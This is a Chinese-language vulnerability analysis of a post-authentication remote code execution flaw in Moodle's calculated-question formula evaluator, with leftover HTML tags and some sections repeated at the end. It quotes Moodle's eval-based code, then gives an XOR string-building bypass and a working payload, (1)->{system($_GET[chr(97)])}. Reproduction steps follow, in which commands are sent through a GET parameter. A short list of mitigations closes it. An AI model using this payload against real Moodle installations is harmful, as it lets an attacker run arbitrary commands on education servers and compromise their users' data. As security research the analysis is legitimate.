Moodle课程系统后台RCE漏洞分析与利用<\/h1>

0x00 系统介绍<\/h2>

Moodle (moodle.org) 是一个开源的在线教育系统(慕课)，采用PHP+Mysql开发，主要功能模块包括：<\/p>

课程管理<\/li>
作业模块<\/li>
聊天模块<\/li>
投票模块<\/li>
论坛模块<\/li>
测验模块<\/li>
资源模块<\/li>
问卷调查模块<\/li>

互动评价(workshop)<\/li> <\/ul>

0x01 漏洞分析<\/h2>

漏洞背景<\/h3>
当教师出计算题时，可以使用变量(通配符)如{a}，系统会检测公式合规性后传递给eval()执行。如果能绕过公式检测，就能执行任意方法。<\/p>

关键代码分析<\/h3>

calculate方法<\/strong>:<\/li> <\/ol>
public<\/span> function<\/span> calculate<\/span>($expression) { <\/span><\/span> \/\/ 检测公式错误 <\/span><\/span><\/span><\/span> if<\/span> ($error =<\/span> qtype_calculated_find_formula_errors<\/span>($expression)) { <\/span><\/span> throw<\/span> new<\/span> moodle_exception<\/span>('illegalformulasyntax'<\/span>, 'qtype_calculated'<\/span>, ''<\/span>, $error); <\/span><\/span> } <\/span><\/span> $expression =<\/span> $this-><\/span>substitute_values_for_eval<\/span>($expression); <\/span><\/span> if<\/span> ($datasets =<\/span> question_bank<\/span>::<\/span>get_qtype<\/span>('calculated'<\/span>)-><\/span>find_dataset_names<\/span>($expression)) { <\/span><\/span> throw<\/span> new<\/span> moodle_exception<\/span>('illegalformulasyntax'<\/span>, 'qtype_calculated'<\/span>, ''<\/span>, <\/span><\/span> '{'<\/span> .<\/span> reset<\/span>($datasets) .<\/span> '}'<\/span>); <\/span><\/span> } <\/span><\/span> return<\/span> $this-><\/span>calculate_raw<\/span>($expression); <\/span><\/span>} <\/span><\/span><\/code><\/pre> calculate_raw方法<\/strong>:<\/li> <\/ol> protected<\/span> function<\/span> calculate_raw<\/span>($expression) { <\/span><\/span> try<\/span> { <\/span><\/span> if<\/span> (@<\/span>eval<\/span>('return true; $result = '<\/span> .<\/span> $expression .<\/span> ';'<\/span>)) { <\/span><\/span> return<\/span> eval<\/span>('return '<\/span> .<\/span> $expression .<\/span> ';'<\/span>); <\/span><\/span> } <\/span><\/span> } catch<\/span> (Throwable<\/span> $e) { <\/span><\/span> } <\/span><\/span> throw<\/span> new<\/span> moodle_exception<\/span>('illegalformulasyntax'<\/span>, 'qtype_calculated'<\/span>, ''<\/span>, $expression); <\/span><\/span>} <\/span><\/span><\/code><\/pre> 公式检测函数qtype_calculated_find_formula_errors<\/strong>:<\/li> <\/ol> function<\/span> qtype_calculated_find_formula_errors<\/span>($formula) { <\/span><\/span> \/\/ 检测PHP注释和标签 <\/span><\/span><\/span><\/span> foreach<\/span> (['\/\/'<\/span>, '\/*'<\/span>, '#'<\/span>, '<?'<\/span>, '?>'<\/span>] as<\/span> $commentstart) { <\/span><\/span> if<\/span> (strpos<\/span>($formula, $commentstart) !==<\/span> false<\/span>) { <\/span><\/span> return<\/span> get_string<\/span>('illegalformulasyntax'<\/span>, 'qtype_calculated'<\/span>, $commentstart); <\/span><\/span> } <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 替换变量为1.0 <\/span><\/span><\/span><\/span> $formula =<\/span> preg_replace<\/span>(qtype_calculated<\/span>::<\/span>PLACEHODLER_REGEX<\/span>, '1.0'<\/span>, $formula); <\/span><\/span> <\/span><\/span> \/\/ 转换为小写并删除空格 <\/span><\/span><\/span><\/span> $formula =<\/span> strtolower<\/span>(str_replace<\/span>(' '<\/span>, ''<\/span>, $formula)); <\/span><\/span> <\/span><\/span> \/\/ 定义安全运算符 <\/span><\/span><\/span><\/span> $safeoperatorchar =<\/span> '-+\/*%>:^\~<?=&|!'<\/span>; <\/span><\/span> $operatorornumber =<\/span> "[<\/span>{<\/span>$safeoperatorchar}<\/span>.0-9eE]"<\/span>; <\/span><\/span> <\/span><\/span> \/\/ 函数调用检测 <\/span><\/span><\/span><\/span> while<\/span> (preg_match<\/span>("~(^|[<\/span>{<\/span>$safeoperatorchar}<\/span>,(])([a-z0-9_]*)"<\/span> .<\/span> <\/span><\/span> "<\/span>\$<\/span>(<\/span>{<\/span>$operatorornumber}<\/span>+(,<\/span>{<\/span>$operatorornumber}<\/span>+((,<\/span>{<\/span>$operatorornumber}<\/span>+)+)?)?)?<\/span>\$<\/span>~"<\/span>,$formula, $regs)) { <\/span><\/span> \/\/ 函数名和参数数量检查 <\/span><\/span><\/span><\/span> switch<\/span> ($regs[2<\/span>]) { <\/span><\/span> \/\/ 省略具体检查逻辑... <\/span><\/span><\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 替换函数调用为1.0 <\/span><\/span><\/span><\/span> if<\/span> ($regs[1<\/span>]) { <\/span><\/span> $formula =<\/span> str_replace<\/span>($regs[0<\/span>], $regs[1<\/span>] .<\/span> '1.0'<\/span>, $formula); <\/span><\/span> } else<\/span> { <\/span><\/span> $formula =<\/span> preg_replace<\/span>('~^'<\/span> .<\/span> preg_quote<\/span>($regs[2<\/span>], '~'<\/span>) .<\/span> '$[^)]*$~'<\/span>, '1.0'<\/span>, $formula); <\/span><\/span> } <\/span><\/span> } <\/span><\/span> <\/span><\/span> \/\/ 最终字符检查 <\/span><\/span><\/span><\/span> if<\/span> (preg_match<\/span>("~[^<\/span>{<\/span>$safeoperatorchar}<\/span>.0-9eE]+~"<\/span>, $formula, $regs)) { <\/span><\/span> return<\/span> get_string<\/span>('illegalformulasyntax'<\/span>, 'qtype_calculated'<\/span>, $regs[0<\/span>]); <\/span><\/span> } else<\/span> { <\/span><\/span> return<\/span> false<\/span>; <\/span><\/span> } <\/span><\/span>} <\/span><\/span><\/code><\/pre>0x02 绕过分析<\/h2> 初始绕过思路<\/h3> 利用异或运算符(^)<\/strong>:<\/p> 安全运算符中包含^<\/code>(异或)<\/li> 可以利用acos(2)<\/code>返回"NAN"的特性构造字符串<\/li> 示例: (acos(2) . 1) ^ (0 . 0 . 0) ^ (1 . 1 . 1)<\/code> => "NAN1" ^ "000" ^ "111" => "O"<\/li> <\/ul> <\/li> 构造任意字符串<\/strong>:<\/p> 通过组合不同的数字和运算符可以构造出任意字符串<\/li> 示例构造"PRINF":<\/li> <\/ul> (acos<\/span>(2<\/span>) .<\/span> 0<\/span>+<\/span>acos<\/span>(2<\/span>)) ^<\/span> (2<\/span> .<\/span> 6<\/span> .<\/span> 0<\/span> .<\/span> 0<\/span> .<\/span> 0<\/span> .<\/span> 0<\/span>) ^<\/span> (1<\/span> .<\/span> 0<\/span> .<\/span> 0<\/span> .<\/span> 0<\/span> .<\/span> -<\/span>8<\/span>) ^<\/span> (0<\/span> .<\/span> -<\/span>4<\/span> .<\/span> 1<\/span> .<\/span> 8<\/span> .<\/span> 0<\/span>) ^<\/span> (-<\/span>8<\/span> .<\/span> 3<\/span> .<\/span> 1<\/span> .<\/span> 0<\/span> .<\/span> 0<\/span>) <\/span><\/span><\/code><\/pre><\/li> 利用可变函数特性<\/strong>:<\/p> PHP支持"function_name"()<\/code>形式的可变函数调用<\/li> 但直接使用(xxx)()<\/code>形式会被检测阻止<\/li> <\/ul> <\/li> 利用变量替换<\/strong>:<\/p> 系统会将{a}<\/code>替换为(a)<\/code><\/li> 构造"phpinfo"{a}<\/code> => "phpinfo"(a)<\/code> => phpinfo(1)<\/code><\/li> 示例构造"phpinfo":<\/li> <\/ul> ((acos<\/span>(2<\/span>) .<\/span> 0<\/span>+<\/span>acos<\/span>(2<\/span>) .<\/span> 0<\/span>+<\/span>acos<\/span>(2<\/span>)) ^<\/span> (2<\/span> .<\/span> 1<\/span> .<\/span> 1<\/span> .<\/span> 0<\/span> .<\/span> 0<\/span> .<\/span> 0<\/span> .<\/span> 0<\/span>) ^<\/span> (1<\/span> .<\/span> 0<\/span> .<\/span> 0<\/span> .<\/span> 0<\/span> .<\/span> 0<\/span> .<\/span> 0<\/span> .<\/span> 0<\/span>) ^<\/span> (0<\/span> .<\/span> 0<\/span> .<\/span> -<\/span>4<\/span> .<\/span> 8<\/span> .<\/span> 8<\/span> .<\/span> 1<\/span>) ^<\/span> (-<\/span>8<\/span> .<\/span> 2<\/span> .<\/span> 3<\/span> .<\/span> 7<\/span> .<\/span> 0<\/span> .<\/span> 0<\/span>)) <\/span><\/span><\/code><\/pre><\/li> <\/ol> 0x03 再绕过<\/h2> 最终RCE方案<\/h3> 利用可变变量特性<\/strong>:<\/p> PHP支持->{..}<\/code>访问类成员变量<\/li> -><\/code>在安全运算符中<\/li> 构造payload: (1)->{system($_GET[chr(97)])}<\/code><\/li> <\/ul> <\/li> 绕过变量替换<\/strong>:<\/p> 前端将数据集<select><\/code>的value置空<\/li> 防止{..}<\/code>被替换为1.0<\/code><\/li> <\/ul> <\/li> 绕过引号限制<\/strong>:<\/p> 使用[chr(97)]<\/code>代替['a']<\/code><\/li> 通过GET参数a传递命令<\/li> <\/ul> <\/li> <\/ol> 0x04 漏洞复现步骤<\/h2> 在题库中创建题目，公式设置为payload:<\/p> (1<\/span>)-><\/span>{system<\/span>($_GET[chr<\/span>(97<\/span>)])} <\/span><\/span><\/code><\/pre><\/li> 在配置变量数据集选项中将value置空<\/p> <\/li> 点击下一页时抓包，添加参数a=命令<\/code>执行:<\/p> http:\/\/target\/page.php?a=ipconfig <\/code><\/pre> <\/li> <\/ol> 总结<\/h2> 该漏洞利用链的关键点:<\/p> 利用异或运算构造字符串<\/li> 利用PHP可变函数和可变变量特性<\/li> 巧妙绕过公式检测的多重限制<\/li> 通过GET参数传递命令实现RCE<\/li> <\/ol> 防护建议:<\/p> 严格限制eval执行的输入<\/li> 加强公式检测逻辑<\/li> 禁用危险函数<\/li> 及时更新系统补丁<\/li> <\/ol>

Moodle课程系统后台RCE漏洞分析与利用<\/h1>

0x01 漏洞分析<\/h2>

漏洞背景<\/h3> 当教师出计算题时，可以使用变量(通配符)如{a}，系统会检测公式合规性后传递给eval()执行。如果能绕过公式检测，就能执行任意方法。<\/p>

0x02 绕过分析<\/h2>

0x03 再绕过<\/h2>

漏洞背景<\/h3>
当教师出计算题时，可以使用变量(通配符)如{a}，系统会检测公式合规性后传递给eval()执行。如果能绕过公式检测，就能执行任意方法。<\/p>